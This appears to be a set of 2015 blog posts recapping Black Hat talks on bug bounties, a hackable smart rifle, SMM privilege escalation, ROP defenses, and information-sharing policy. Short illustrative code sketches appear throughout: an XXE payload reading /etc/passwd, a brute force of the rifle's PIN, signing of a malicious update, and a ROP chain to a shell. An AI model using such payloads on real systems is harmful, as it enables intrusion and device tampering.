Friday, August 7, 2015

BHUSA15: Black Hat Roundup

I just got back from my first Black Hat conference!  It may seem strange that I'd never been, but it always seemed too expensive, and many of the talks were repeated at DefCon.  My first DefCon was DC2 - I was still basically a kid. I could not drink nor gamble, but I had a blast year after year meeting super bright folks and learning neat hacks.  What I learned at DefCon has definitely shaped my career - there's no way I would've ended up with a more than two decades long career in computer security without it.

Did DC have its downsides? Yes, definitely. As noted by a woman on the "Beyond the Gender Gap" panel, it gets tiring "proving it again" (and again) every time I would walk into the room at DefCon. "Who's your boyfriend?" "I'm single." "Oh, so you're a scene whore?" "No." "Oh, then you're a fed!"

Then I would have to proceed to prove my technical prowess over and over again. (Best advice for men came from that panel: never start with "who are you here with?", but rather "what do you do?") [Note: I did have a boyfriend my first couple of DefCons, and later a husband - who did not come, as he wasn't interested in the con - but I was at other times single.]

DefCon also had amazing moments - here we are at DC9 in 2001. Babies!  (I don't seem to have older pictures on my site - but I was there, usually with Artimage and Angus).

But, that didn't happen at Black Hat. Folks (men and women) spoke to me like a human. It was really nice.  Other than when I went to the bar to meet one of my friends Tuesday night, nobody stared at my chest. I was able to attend two women-focused luncheons and meet lots of interesting and smart security-focused women.  Black Hat USA has a Code of Conduct, lots of staff, and plenty of time between sessions to network, charge batteries or go pee.

I want to thank Runa Sandvik, who first of all gave an awesome talk on a WiFi-enabled rifle (you know, we all need one), and who gave me the free pass to attend!

Still surprising to see people drinking at 7:30 in the morning, and drinking EVERYWHERE (in the elevator a lot).  Coming from California, all the smoking was strange, too. A guy sat next to me in a session "vaping" pot - really? Can't wait until break?  Fortunately, the conference halls were non-smoking, so I escaped an asthma attack.

Overall, a very informative conference! I would highly recommend it for the very high caliber, true research talks.

Did you have a good time? Any stories to share?

Thursday, August 6, 2015

BHUSA15: Hi This Is Urgent Plz Fix ASAP: Critical Vulnerabilities and Bug Bounty Programs

Kymberlee Price, Bugcrowd (aka @kym_possible).

We won't be talking about low-severity bug bounty submissions today, just the critical bugs. Kymberlee has an extensive background as a developer and has been working lately on a "red team".

Google runs a vulnerability reward program (VRP) that they publish some data on. It doesn't include the Chrome award, Android award, or patch award programs - but it includes lots of other things: Google.com, Google Play, etc.

The more time that passes, the fewer vulnerability reports come in - but they seem to be of higher quality. Google has had to increase their bounty to keep the bugs coming in.

Facebook has a similar program and had 17,000 submissions in 2014 alone. Out of that, only 61 were high severity bugs. Their minimum award is $500.  Their total payout for valid submissions was $1.3 million to 321 researchers. Their top 5 researchers made a total of $256,750 - those had to be massive vulnerabilities.

India is Facebook's highest source of valid bug submissions, with Egypt coming in second - and the USA in third place.  In India, the average payout was $1343, in Egypt $1220, and in the US $2470.

Github's bug bounty program is 1 year old today!

Microsoft will pay up to $100,000 for novel exploitation techniques against protections built into the OS, and an additional reward of up to $100,000 if you also develop a defense.

MS runs a "hall of fame" - which indicates you received a bounty. If your vuln results in a CVE, you'll be noted in the security alert.

Whether it's software or online services changes who is submitting your bugs (e.g., India is very high for MS's online services, but submits fewer for software).

Bugcrowd followed 166 customer bug bounty programs, which received 37,227 submissions. There were about eight thousand non-duplicate, valid vulnerabilities. Of those, 3,621 were awarded - paying out $700,000+ (average payout around $200, largest $10,000).

Every one of these programs is getting really critical vulnerabilities.

Who is finding these?  Professional Pen Testers and consultants (in their spare time), former developers, QA engineers and IT admins.

India, US and Pakistan are top three for volume of submissions.

Reginaldo Silva reported an XML external entity vulnerability in a PHP page that would have allowed a hacker to change Facebook's use of Gmail as an OpenID provider to a hacker-controlled URL, and then service requests with malicious XML. It was fixed quickly, and the researcher was rewarded and recognized.
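
As a concrete illustration of the bug class, here's a minimal sketch of the classic XXE pattern in Python (illustrative only, not Facebook's actual code): a parser that resolves external entities will substitute attacker-controlled files or URLs into the parsed document.

    # Hedged sketch of XXE. lxml's resolve_entities/no_network options
    # are real; the payload is a toy example.
    from lxml import etree

    malicious = b"""<?xml version="1.0"?>
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    <foo>&xxe;</foo>"""

    # Vulnerable: entity resolution enabled, so the document's text
    # becomes the contents of the referenced local file.
    vuln = etree.XMLParser(resolve_entities=True)
    print(etree.fromstring(malicious, vuln).text)

    # Safer: refuse entity resolution and network access for untrusted XML.
    safe = etree.XMLParser(resolve_entities=False, no_network=True)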

Kymberlee then did a deep dive into a few of these fun (and very serious) vulnerabilities, even including videos and audio from the researchers who found them. These vulnerabilities affected things like banks and cars!

You need to make sure you tell researchers in advance what you need to help you triage faster (this can be via email or webform). Set expectations, and have a rapid triage and prioritization process in place (to get to the P1s faster).

Now, don't expect an eloquent write-up - English may not be the researcher's first language. Allow them to provide a video of the reproduction steps.

You need to have your "in scope" and "out of scope" clearly defined, and a process for how to handle things that don't fit into either category (because they weren't defined well enough - it will happen).

To reduce noise, provide pointers to guidance and training, like Bugcrowd's forum.

Have a plan to deal with duplicates. Don't see this often for P1 or P2, because those are fixed quickly.  Don't let the lower priority bugs languish, either. If they are getting reported over and over again, you're wasting resources telling the researchers they have hit a duplicate - and if researchers are finding this every week, so are the bad guys.

Some of the bugs can be so severe that catching them is worth the entire cost of the program. You don't want those vulnerabilities out there.

How to reduce noise? Publish and stick to your program SLA. Stop rewarding bad behavior (i.e., don't give someone "hall of fame" acknowledgement just because they are pestering you).  Prevent bad behavior by being consistent, rewarding quickly, and having good documentation.

By crowdsourcing this, you can bring people from around the world into your security team - people who cannot or do not attend conferences like Black Hat, etc.

This was a really fascinating and informative presentation!

BHUSA15: When IoT Attacks: Hacking a Linux-Powered Rifle

Runa A. Sandvik is a privacy and security researcher, working at the intersection of technology, law and policy.

 Michael Auger is an experienced IT security specialist with extensive experience in integrating and leveraging IT security tools.

Runa and Mike spent the last year researching the TrackingPoint 338TP. When CNN asked Runa why attack a rifle, she replied: because "cars are boring".

The base rifle is a Remington 700 .308 bolt-action rifle. The hardware platform is called "Cascade" and runs a modified Angstrom Linux.

It uses Tag Track Xact (TTX).

The wifi is off by default, and you cannot fire the rifle remotely.  The gun still works even if the scope/targeting system is broken - it is a gun, after all.

The first thing that they did was run a port scan on the rifle. It runs a webserver and an RTSP server.
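
For flavor, here's the sort of quick TCP probe that would turn up those services - a hedged sketch in Python, where the rifle's address and the exact ports are assumptions, not values from the talk:

    # Minimal TCP connect scan against a handful of likely ports.
    import socket

    RIFLE = "192.168.0.1"  # assumed address on the scope's own WiFi net
    for port in (80, 443, 554, 8080):  # HTTP and RTSP candidates
        s = socket.socket()
        s.settimeout(0.5)
        if s.connect_ex((RIFLE, port)) == 0:
            print("open:", port)
        s.close()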

The more interesting side is the TrackingPoint app - you can adjust settings for wind, manage media, and do software updates.

The mobile app was using encryption, etc.

When they got stuck ... they just tried ALL THE THINGS! :-)

After round 1, they found that the SSID contains the serial number, and it can't be changed. The WPA2 key is guessable, and it also cannot be changed. Any RTSP client can stream the scope view.

The API is unauthenticated, but it does validate input.

There is a 4-digit PIN that locks advanced mode - you can brute-force it, and /set_factory_defaults resets the lock.  Updates to the rifle are GPG encrypted and signed.
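
A 4-digit PIN over an unauthenticated local API is a tiny search space. Here's a hedged sketch of what brute-forcing it could look like - the endpoint and parameter names are invented for illustration; only /set_factory_defaults was named in the talk:

    # Try all 10,000 PINs against a hypothetical unlock endpoint.
    import requests

    SCOPE = "http://192.168.0.1"  # assumed scope address

    for pin in range(10000):
        r = requests.get(SCOPE + "/unlock_advanced",  # hypothetical path
                         params={"pin": "%04d" % pin})
        if r.status_code == 200:
            print("PIN accepted:", "%04d" % pin)
            break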

Round Two...

Fortunately, TrackingPoint's website has an excellent diagram of what the rifle looks like inside, before tearing it apart - they actually used their CAD drawings in their marketing material.  Though the website shows a lot of 2D renderings, in reality the circuit board is round :-)

To get the circuit board out, you have to desolder at least 60 pins.

So excited to see it booting Linux!

But, alas, it did not auto-login as root.

Console access is at least password protected and the kernels and filesystem are on separate chips.

The filesystem chip was hidden under a big capacitor - they missed it the first few times.

Some of the folks they were working with recognized the silk screening on the board and recommended an eMMC-to-USB converter. Then they got to see what was on the filesystem.

The webserver had a lot of interesting APIs, like ssh_accept - that could be fun!

The system backend requires an unpublished API call to open a port. The API validates input; the backend does not. You can make temporary changes to the system: change wind, temperature, and ballistics values, control the solenoid, etc.  They could even lock the trigger, crash the gun, make the scope think it is attached to a different firearm, or make one command segfault (which triggers a reboot).
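
Conceptually, the attack shape is simple: reach past the validating front-end API to the trusting backend. A hedged sketch (the endpoint and JSON fields are hypothetical; the talk did not publish the real call names):

    # Push an absurd environmental value straight at the backend.
    import requests

    SCOPE = "http://192.168.0.1"  # assumed scope address

    # The public API would reject this; the unpublished backend call
    # performs no validation, so the ballistics solver trusts it.
    requests.post(SCOPE + "/api/backend/set_env",  # hypothetical path
                  json={"wind_mph": 99.0, "temperature_f": -40})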

The changes are temporary, if the user reboots, the changes will be lost.

Now time for demos!

We watched a change in the ballistics values screw up the calculation so that the shot hit the target next to the one the shooter was aiming at.

TrackingPoint operates with two GPG keys for updates, one of which is on the scope. The update script accepts packages signed by either of the two keys. This allows you to make persistent changes to the system AND get root access.
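
The flaw's shape, sketched with the real gpg CLI driven from Python (key and file names here are made up): if the updater accepts a signature from either key, and one of those keys ships on the device itself, extracting it lets you sign your own "update".

    # Sign a malicious update with the key recovered from the scope,
    # then confirm it verifies the same way a legitimate update would.
    import subprocess

    subprocess.run(["gpg", "--local-user", "recovered-scope-key",  # made-up key ID
                    "--sign", "evil-update.tar"], check=True)
    ok = subprocess.run(["gpg", "--verify", "evil-update.tar.gpg"])
    print("accepted" if ok.returncode == 0 else "rejected")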

They were successfully able to log in as root with no password!

Round 3 findings: the admin API is also unauthenticated, the system backend is unauthenticated and does not validate input, and the GPG key on the scope can encrypt and sign updates.

They did need prior access to the rifle for all of these attacks.

But, there are ways to do remote code execution - if you can get on the wifi.

It's not all that bad... USB ports are disabled during boot, media is deleted from the scope once downloaded, and WPA2 is in use, even if the key cannot be changed. The API does validate user input, console access is password protected, and software updates are GPG encrypted and signed.

Will this get better?  They had been calling TrackingPoint since April with zero replies - until Wired called... since then, they have received two calls. TrackingPoint is working on a patch. They have been easy to work with, once the connection was made.

"You can continue to use WiFi (to download photos or connect to ShotView) if you are confident no hackers are within 100 feet" - note on TrackingPoint's website. :-)

They had done security work (better than most people doing embedded work).

BHUSA15: Black Hat Panel – Beyond the Gender Gap: Empowering Women in Security

Kelly Jackson Higgins, Executive Editor at Dark Reading (panel moderator)

This is a growing industry, but women are leaving. We need more people, so how do we empower the women we have?

Panelists:
Justine Bone, Independent Consultant
Joyce Brocaglia, Founder, Alta Associates (an executive search firm for security, etc.)
Jennifer Imhoff-Dousharm, co-founder, dc408 and Vegas 2.0 hacker groups
Katie Moussouris, Chief Policy Officer, HackerOne

All of the women here come from different backgrounds - hacking (black hat and white), executives, startups, big companies.

Justine learned a big, hard lesson when she dropped out of industry to work on her own startup - at the same time as having kids.  While she was working her butt off, she wasn't showcasing her work or engaging with her peers - everybody thought she'd taken time off to have kids, totally unaware of the hard work she'd been doing. Lesson: always engage, promote, etc.

Joyce mentioned that she sees a lot of employee resource programs that are more checkboxes than actually beneficial programs for women. She noted that a company might pay Alta $100,000-$150,000 to find a new executive, but when she asks if they'll pay $100,000 for a leadership program with a proven track record, the same company will say "we don't have that kind of money." (note: sigh)

Katie started up a bug bounty program at MS - it was hard.  Big companies had vowed to never pay ransom for security bugs, so she had to present this in a different way, to line it up with their goals and build organizational empathy (when is the best time for devs to get vulns?). Hence the IE 11 Beta Bug Bounty - which ran for 30 days. Alas, folks would hold on to their vulns until after the beta was closed, forcing MS to release vulnerability reports.

We have a shortage of engineers, so why aren't women coming in?  Jennifer said she doesn't see it as a pipeline problem - she noted that women who grew up in the 80s were exposed to computers (yay, Oregon Trail) and didn't hit the "cootie" problem until they entered corporate America. It's scary to be the only person like you in the room - you don't realize it until you are that only woman. It doesn't matter how strong you are or how much you lean in, you have to carry that weight of diversity.

Justine noted the "DefCon problem" - it's annoying that everyone asks you "who are you here with? who's your boyfriend" - it gets exhausting. (Note: YES - happened to me every year, after my bf & I broke up and I continued to go alone).  Explaining over and over that you deserve to be there, what you do, that you really are technical.

Katie noted there's a challenge as well that you are expected to be a representative of ALL women, regardless of how different we all are.  She hates the question "what's it like being a woman in security?" - stop asking her about the least important aspect of her job and her personality; she is so much more than just "a woman in security."

Joyce notes that she sees job advertisements all the time that literally use the male gendered pronoun: "he will be responsible for X, Y, Z". Knowing that men will apply for a job where they meet only 6/10 of the qualifications, while women require 9/10 before they will apply... adding "he" to the description is one thing, right off the bat, that a woman will not be.  Confidence matters as much as competence - men tend to have more confidence, which may help explain why women are not making it to the higher levels.

Companies need to invest in younger women to make these changes - they are an investment.  Women and men need sponsors, but companies should make sure that it's not only men getting them. If women are raising their hands for stretch assignments, but getting skipped over... is it their fault?

Justine noted that we also need to be willing to accept help - if someone tries to bring you into the "old boys club" - GO! Joyce cautioned, though, don't wait for it.

Justine says she's always criticized for her travel for work, by friends, family, etc. How could she leave her kids? She notes she's on these flights with a ton of men doing the same thing - and nobody criticizes them.

Can you have work and family?  Yes, but you need help - nannies, families, etc. "Women have the capacity to multitask and get shit done," said Joyce.

Personal space at these events is important. Katie had a run-in with "Handsy McMansy" last night - fortunately, she's adept at profanity and threw some at him. The men around, though, seemed shell-shocked and didn't know what to do. "I don't need somebody to fight for me, I need them to fight with me."

Joyce had a similar run-in last night with a male executive - sloppy drunk, asking dumb questions and hanging on people. If a woman did that, she would be shamed by the men around her.

Joyce noted that women still don't get taken seriously at booths at events like RSA.  People don't want to talk to the women, even if they may be the one making purchasing decisions.

Justine looked at the Black Hat review board this morning - there is only ONE woman on the review board. Not saying the men on the board are not skilled and talented, but they need diversity.

Joyce noted that women need to submit talks, start with smaller conferences and get practice, confidence, etc. 

Men should talk to women at conferences - acknowledge them, don't question why they are here - but actually engage. Like, "what do you do at your company?" vs "who's your boyfriend?"

Joyce noted that older generations of men are lacking the emotional intelligence to understand why what they are doing or saying is not okay. She has high hopes for the younger generations, who grew up with working moms, etc.

Katie noted that women need to stop denigrating themselves - the world will do that for you. Speak about your work in positive tones, not "well, I don't do kernel work, I don't do...". Believe in yourself and don't be afraid to tell the world about what you do.

BHUSA15: Information Access and Information Sharing: Where We Are and Where We Are Going

Alejandro Mayorkas, Deputy Secretary of Homeland Security.

Homeland security means security of our institutions, security of our way of life and most importantly security of our values.  Security of the Internet is very much a part of what we do. It is clear that the challenges of network security are immense. We as a government are making advances in this area, but we are not where we need to be.

Every morning, the secretary and he get a briefing about threats - events that are occurring or are about to occur all over the world. Increasingly, Internet security events are common in that meeting.

The more he travels around the country, the more obvious it becomes how important this is for everyone.  Internationally, it's the same thing: foreign companies and governments all care about this.

The current state of affairs, with individualized responses, is not working well to ensure that the Internet is protected.  DHS considers themselves uniquely situated to address these concerns: DHS is a civilian agency, standing at the intersection of the private sector, the enforcement community, the intelligence community, and the desire to protect .gov.  They have created a critical response set of protocols and an organization (the National Cybersecurity and Communications Integration Center).

DHS currently shares information in bulletins or entity to entity. It is not currently in an automated fashion. The President, in his last executive order, placed DHS in charge of leading information sharing with the private sector.

DHS wants an automated and near real time way to share and disseminate information, to raise the bar and capacity for the private sector to protect themselves.  When a threat is shared with DHS, they can receive that in automated form and disseminate in near real time to prevent replication of that threat.

One thing in their way: the issue of trust. That emanates from a variety of sources - can DHS keep this secure? Can you trust those providing information?

DHS needs to work on building trust - it will take time, but will be worth the effort.

As they are working on the automatic reception of cyber threats, please give them a chance and share some information so that they can prove their capabilities and prove their results.

Question about how important is it for private industry to participate?  Answer: very, many of them are very critical systems. It's critical they participate.

We have to understand our responsibilities for the public good. Alejandro hopes that shared cyber threat information will have a public dimension - it's vital for it to be shared far more publicly than it is now. This is important for DHS's mission to secure the country.

DHS is very active in research and development for achieving network security - investing in the public as well as the private sector.

Various questions showed that folks are nervous about sharing with the government; Alejandro noted that they will be working on correcting that.

Another questioner asked about the OPM breach, where agencies lost lots of personal information.  He noted that not all agencies are as advanced as others, and they've been doing a 30-day security activity with the goal of improving this.

Question: will information about 0-days that the government has bought be shared? Answer: we are going to declassify and release everything that we can.

Question: the government is known for antiquated systems - how do we know you'll do this right? Alejandro noted that they have to start with new gear and stay on top of the systems. (No Windows NT here.)

Additionally, DHS is looking at recruiting the best and the brightest, and even looking at opening an office in Silicon Valley.

BHUSA15: Return to Where? You Can't Exploit What You Can't Find

Christopher Liebchen & Ahmad-Reza Sadeghi & Andrei Homescu & Stephen Crane

We're concerned with many problems that are actually three decades old. Nowadays, everyone has access to cell phones, built by many developers with different intentions and different backgrounds (particularly with respect to security).

So - how do we build secure systems from insecure code?  Seems counter-intuitive, but we have to do it. We cannot just keep adding more software onto these old systems.

We've had decades of run-time attacks - like the Morris Worm in 1988, which just keeps going.

There are a number of defenses, but often the "defenses" are broken - sometimes by their original authors just a few years later.  So, the quest for practical and secure solutions continues...

Big software companies, like Google and Microsoft, are very interested in defending against run-time attacks - EMET and CF Guard from MS, IFCC and VTV from Google.  But how secure are these solutions?

"The Beast in Your Memory" includes a bypass of EMET: return-oriented programming attacks against modern control-flow integrity protection techniques...

The main problems are memory corruption and memory leakage.

You can do a code-injection attack or a code-reuse attack.

Randomization can help a lot, but it's not perfect.

Remember the basic idea of return-oriented programming: use small instruction sequences instead of whole functions. The instruction sequences are 2 to 5 instructions long, and all end with a return instruction. The sequences are chained together, each return determining what code executes next.
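
To make that concrete, here is a toy sketch of what a ROP payload actually is: just a list of gadget addresses laid out where saved return addresses live (all addresses below are made up for illustration):

    # A classic three-entry chain: pop rdi; ret -> "/bin/sh" -> system().
    import struct

    POP_RDI_RET = 0x00401234  # gadget: pop rdi ; ret (made-up address)
    BIN_SH_STR  = 0x00601050  # address of a "/bin/sh" string (made up)
    SYSTEM_PLT  = 0x00401040  # address of system() (made up)

    # Overwriting a saved return address with this buffer makes the CPU
    # "return" through each gadget in turn: rdi <- "/bin/sh"; system(rdi).
    chain = struct.pack("<QQQ", POP_RDI_RET, BIN_SH_STR, SYSTEM_PLT)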

Assumptions for the adversary model: memory pages are writable or executable (never both), address space layout randomization (ASLR) is in place, and the attacker can disclose arbitrary readable memory.

Main defenses: code randomization and control flow integrity.


Randomization has low performance overhead and scales well to complex software. Though, it suffers from low system entropy, and information disclosure is still hard to prevent.

For CFI: formal security (explicit control flow checks) - if something unexpected happens, you can stop execution (in theory).  It's a trade-off between performance and security (it's inefficient), and it's challenging to integrate into complex software.

What about fine-grained ASLR? You are just trying to make things more complicated for the attacker.  But this has been attacked by JIT-ROP (BH13), which undermines any fine-grained ASLR and shows memory disclosures are far more damaging than believed. It can be instantiated with real-world exploits.

Then we got a pretty graphical demo of how JIT-ROP works.

Their current research is around code-pointer hiding.

Their objectives were to prevent code reuse & memory disclosure attacks. It should be comprehensive (ahead of time + JIT), practical (real browsers) and fast (less than 6% overhead).

They prevent direct memory disclosures by using execute-only code pages, which prevent direct disclosure of code. Previous implementations did not entirely meet their goals, so they fully enforce execute-only permissions with current x86 hardware.

We have virtual addresses that get translated to physical addresses. During translation, the MMU can enforce permissions. Normally, as soon as a code page is executable, it is also readable - but you might want something to be executable, yet not readable.  You can do this with extended page tables (EPT), which can mark a page as execute-only (not readable).

The attacker can leak pointers to functions that point to the beginning or in the middle - once he's got that pointer, he can figure a lot more things out.

So, we can add another layer of indirection: code pointer hiding!

They modified the Readactor compiler so they would have code/data separation, fine-grained code randomization, and code-pointer hiding.

Their goal is to protect applications which are frequent targets of attack. These have JIT (just-in-time) code, which is harder to protect, as it frequently changes.  Solution: alternate EPT usage between a mutable mapping (RW-) and an execute-only mapping (--X).

Now, does this actually work?  They checked performance with SPEC CPU2006 and Chromium benchmarks, and checked practicality by compiling and protecting everything in Chromium.

The full Readactor caused roughly a 6.4% slowdown. But if you only use the hypervisor-enforced execute-only mode, that's only around a 2% performance impact, which seems acceptable.

How does it do with regard to security? It is resilient against (in)direct memory disclosure.

Code reuse attacks are a severe threat - everyone acknowledges this. Readactor is the first hardware-enforced, execute-only, fine-grained memory randomization for current x86 hardware.

BHUSA15: The Memory Sinkhole – Unleashing an x86 Design Flaw Allowing Universal Privilege Escalation

Chris Domas is an embedded systems engineer and cyber security researcher, focused on innovative approaches to low level hardware and software RE and exploitation.

There has been a bug in the x86 architecture for more than 20 years... just waiting for Chris Domas to escalate privileges.

Chris did the demo on a small, cheap netbook. In case it didn't work, he had a stack of netbooks.  We watched a general user run a simple program and end up with root.

Some things are so important that even the hypervisor should not be allowed to execute it.

We originally wanted to do power management without the OS having to worry about it - system management mode. SMM became a dumping ground for all kinds of things, and eventually it took on "security" enhancements.  Now SMM is important: root of trust, TPM emulation and communication, cryptographic authentication...

Whenever there was something important or sensitive or secret, it got stuck in SMM.

Userland is at Ring 3, the kernel in Ring 0. Ring -1 is the hypervisor... Ring -2 is SMM. On modern systems, Ring 0 is not in control. We have to get deeper than (and hide from) Ring 0.

If you're in Ring 0 and try to read from SMM, you'll just get a bunch of garbage. The memory controller separates SMRAM from the rest of the system. If you're in SMM, though, you can read from SMRAM.

There are many protections on SMM - locks, blocks, etc. - but most exist in the memory controller hub. There has been lots of research in this area on how to get to Ring -2.

The local APIC used to be a physically separate chip that did this management. But it's more efficient and cheaper to put the local APIC on the CPU - now it's even faster!

Intel reserved 0xfee00000-0xfee01000 for the APIC - so to access the memory underneath, you have to take some roundabout ways to get there. When they created this model, it broke legacy systems that expected that segment of memory to map to something else. The Intel SDM, circa 1997, describes what happened here in the P6.

So we're allowed to move where the APIC window is located, allowing access to the APIC reserved space.  This "fix" opens systems up to this vulnerability.

If we're in Ring 0 and we try to read SMRAM, we will be denied. But you can do it from SMM. What if we're in Ring 0 and relocate the APIC window? Then, from Ring 0, we can read SMRAM - and once we can do that, we can modify SMM's view of memory.  The security enforcer has been removed.

How to attack Ring -2 from Ring 0? SMRAM acts as a safe haven for SMM code. As long as SMM code stays in SMRAM, Ring 0 cannot touch it. But if we can get SMM code to step out of its hiding spot, we can hijack it.

Move the APIC over SMRAM, corrupt execution, trigger a fault in SMM. This gets it to look up an exception handler - under our control.  Though, that attack doesn't work: there's an undocumented security feature which triple faults (resets) the system.

He overlaid the APIC MMIO range at the SMI entry point, SMBASE+0x8000 - getting the APIC registers and the SMI entry point to overlap.

Now we just need to store shellcode in the APIC registers. The challenge is that the APIC window has to be 4K aligned. Place it exactly at the SMI entry point, and execution begins at exactly the start of the APIC registers, with 4096 bytes available.

Many registers are largely hardwired to 0, leaving few registers that can actually be changed. We need to do something useful before the system resets.

You need to keep things from executing right away, before the last byte is activated.

We only really have 4 bits with which to actively attack the system.  Looking at the opcode map, there's not a lot of interesting things you can do with that.

But the attack didn't work as expected. We still can't execute from the APIC, so we must control SMM with data alone.

How do we attack code when our only control is to disable some memory?

SMM code comes from system firmware.  Intel makes template code, which goes to independent BIOS vendors; then the OEMs (HP, Toshiba, Lenovo) make more changes.

The only way to make a general attack is to look at the EFI template BIOS code from Intel, as that will be on EVERY system.

From Ring 0, we try to sinkhole the DSC to switch it into system management mode.  We've lost control, but maybe it'll let us do something before memory resets.

(Lots of stuff about self-rewriting code, far jumps and long jumps, and lots of hex codes.)

Then he successfully got the SMM to read code that he could control, by controlling the memory mapping.

The exploit is only 8 lines of code, using hardware remapping, descriptor cache configurations, etc.

In the end, he used well-behaved code in order to abuse a different area.

This has opened up a new class of exploits.  Now that we have Ring -2 control, what can we do?  We can disable the cryptographic checks, turn off temperature control, brick the system, or install a rootkit.

Once we have control, we can preempt the hypervisor, do periodic interception, filter Ring 0 I/O, modify memory, escalate processes, etc.

Adapted code from Dmytro Oleksiuk.

We can simultaneously take over all security controls. Mitigations don't look good: this is unpatchable and would need new processors... which Intel did. Their developers seem to have found this independently. This is fixed as of Sandy Bridge and the 2013 Atoms - the SMRRs are now checked when the APIC is relocated.

intel.com/security has a write-up on this. They have been easy to work with, and have been working on mitigations wherever it was architecturally possible.

Wednesday, August 5, 2015

BHUSA15: Panel: Getting it Right: Straight Talk on Threat & Information Sharing

Panelists: Trey Ford (@treyford) is the Global Security Strategist at Rapid7; Kevin Bankston (@kevinbankston) is the Director of the Open Technology Institute and Co-Director of the Cybersecurity Initiative at New America; plus @brianaengl and @hammem. (The speaker lineup appears to have changed, so twitter handles are what I've got :-) Also, the podium is super giant and blocking my view of the speakers, so I can't tell you who is saying what.)

Sharing sounds like fun, but it's not as simple as we remember from our childhood.  There are legal implications, contracts, source trust issues, etc.

Intelligence is like a UDP packet you cast out and hope for the best.  How do you determine if the information is still relevant?

Facebook is working on this - how to do exchange of data?  What can we learn from it?

When people start sharing data, they realize that they need to share with someone who cares. I.e., if your concern is about phishing, don't build a relationship with someone who is focused on bitcoin.

What is stopping companies from sharing information with other companies and the government? It will be relevant to you if new legislation passes.

Some of the barriers are around the Wiretap Act (Title II) portion of the ECPA, which places limits on real-time communications and limits disclosure. Other limits: federal privacy laws protecting HIPAA data and educational records, self-imposed restrictions in Terms of Service, and anti-trust laws (the DoJ could accuse companies of colluding in an anti-competitive way).

Well, and there are nervous lawyers :-)

Most threat information doesn't include content or PII. Non-content can be liberally shared, with exceptions for security and consent via ToS.  DoJ has stated they won't go after companies sharing for these reasons.  Companies already do a lot of sharing, so do they really need new legal permissions?

But there's the new CISA: the Cybersecurity Information Sharing Act, S. 754.  It authorizes sharing of broadly defined "cyber threat indicators" and info about "defensive measures" with "any other entity or [any agency of] the Federal Government".

DHS must distribute all information to other agencies, including the NSA, "not subject to any delay or modification". The government can use the information to investigate or prosecute a range of crimes unrelated to cybersecurity.

The House is also working on bills!

Congress has been looking at bills like CISA since 2009, and they are starting to feel like they have to do something to show they are serious about cybersecurity.

Please call your senator to oppose the bill and support privacy-enhancing amendments. If it does pass, it still has to go to conference with the House.

Check out StopCyberSpying.com or call 1-985-222-CISA for more information.

BHUSA15: Stranger Danger! What is the Risk from 3rd Party Libraries?

Kymberlee Price, Bugcrowd, and Jake Kouns is the CISO for Risk Based Security.

It's well known that vulnerability statistics suck (see Steve Christey's (MITRE)  Black Hat 13 talk).

But, the truth is - we are getting attacked, lots of new (and old) vulnerabilities.  This is getting worse every year, not better.

Secunia says there are 15,000 vulnerabilities, but they counted Heartbleed as 210 different vulnerabilities (our speakers say it was just one, while some audience members argued it was three).

There were 100+ vendors impacted by Heartbleed, affecting over 600,000 servers.

Very large companies are using OpenSSL: Oracle, HP, Blackberry, Juniper, Intel, Cisco, Apple, etc... so it's not just little startups using open source anymore.

There have been 52 new vulnerabilities fixed since Heartbleed - average score of CVSS of 6.78.  Nine of them had a public exploit available.

We're beating up on OpenSSL - but what about the GNU C library (GHOST), which had a heap vulnerability in it? It's everywhere.

Efficiency at what cost?  By leveraging third party source, companies can deliver faster, cheaper, etc. But what are companies picking up in exchange?  Some products have more than 100 third party libraries in them. Are they being treated with as much scrutiny as they should be?

The speakers aren't saying: "Don't use 3rd party libraries", but rather to think about things during design and development.

All of the data they are sharing this week are from public sources, even though that data is limited.

Look at FFmpeg - they have 191 CVEs, but over 1000 vulns fixed.

These vulnerabilities spread - think about the FreeType Project's font engine. It's used by Android, FreeBSD, Chrome, OpenOffice, iOS, video games (including the American Girl Doll game).  Everywhere!  There was a vulnerability (a missing parameter check) that allowed you to jailbreak your iPhone... or someone else to take over your iPhone.  This is insidious, as you have to wait for each vendor to fix it.

libpng, Apache Tomcat... everyone is using this and including these things in toolkits.

We shipped a vulnerability to Mars! (Java is on the Mars Rover).

Interesting to note: some vendors don't even release CVEs for anything under a CVSS of 5.0. Since 2007, the number of CVEs: OpenSSL (90), Flash (522), Java (539), FreeType (50), libpng (28), Apache Tomcat (100).

Now, this is not telling you which is more or less secure. For example, Adobe has an excellent bug bounty program and internal pen testers. Just because a product has only a few reported CVEs doesn't mean more aren't lurking.

We should consider time to relief: how long does the vendor know about the issue before they provide a fix? You can use this to figure out how serious that vendor is about security.

They had to define a framework to understand time of exposure, identify vendors and products you want to work with, and establish a scorecard.

Vendor response time is how long from when the vendor was informed until they responded to the researcher. This can't be an automated reply - it must be an actual acknowledgement.

Time to patch - when do the customers get relief.

But another time to consider: how long were customers vulnerable? That is, how long from when the patch was available to when the patch was applied (many folks only do updates quarterly, for example). Total time of exposure covers the period from when the vulnerability was discovered until it was fixed at the customer site.
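
A small worked example of those windows, with made-up dates, to show how the metrics fit together:

    from datetime import date

    discovered   = date(2014, 1, 1)   # researcher finds the bug
    reported     = date(2014, 1, 10)  # vendor informed
    acknowledged = date(2014, 1, 20)  # real (non-automated) vendor reply
    patched      = date(2014, 4, 1)   # fix shipped to customers
    deployed     = date(2014, 5, 1)   # customer actually applies it

    print("vendor response:", (acknowledged - reported).days, "days")
    print("time to patch:  ", (patched - reported).days, "days")
    print("total exposure: ", (deployed - discovered).days, "days")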

We got to walk through a few case examples.

In one case, a researcher reached out to a company on twitter asking how to securely disclose a vulnerability - and for 2.5 months they kept pointing the researcher at their insecure support page.

It is critical for vendors to respond promptly and investigate the issue.

And this data is hard to figure out, as the terminology for "zero day" (oh day, 0day) seems to be malleable. The speakers believe that it's only a 0-day while the vendor does not know about it.  Once the vendor knows, or the vuln is publicly disclosed, it's no longer a zero day.

In one case, the vendor created a patch - but did not release it; instead, they wanted to roll it up into their next version release. In the end, their customers were exposed for 451 days.

While most companies update their systems every 30 days, their exposure could be much longer due to a vendor not actually providing the fix to their customers.

Advice: once you incorporate a third party software suite into your tools, you need to become active in that community - watch it, help out, provide funding - or you are putting your own customers at risk.

You also need a clear prioritization scheme, to know what to fix and when (as most likely your incoming rate is higher than your fix rate).  Proactively manage your risk: understand what third party code your organization relies on, implement a plan to address the exposure, and work with the vendors.

BHUSA15: Gameover Zeus: Badguys and Backends

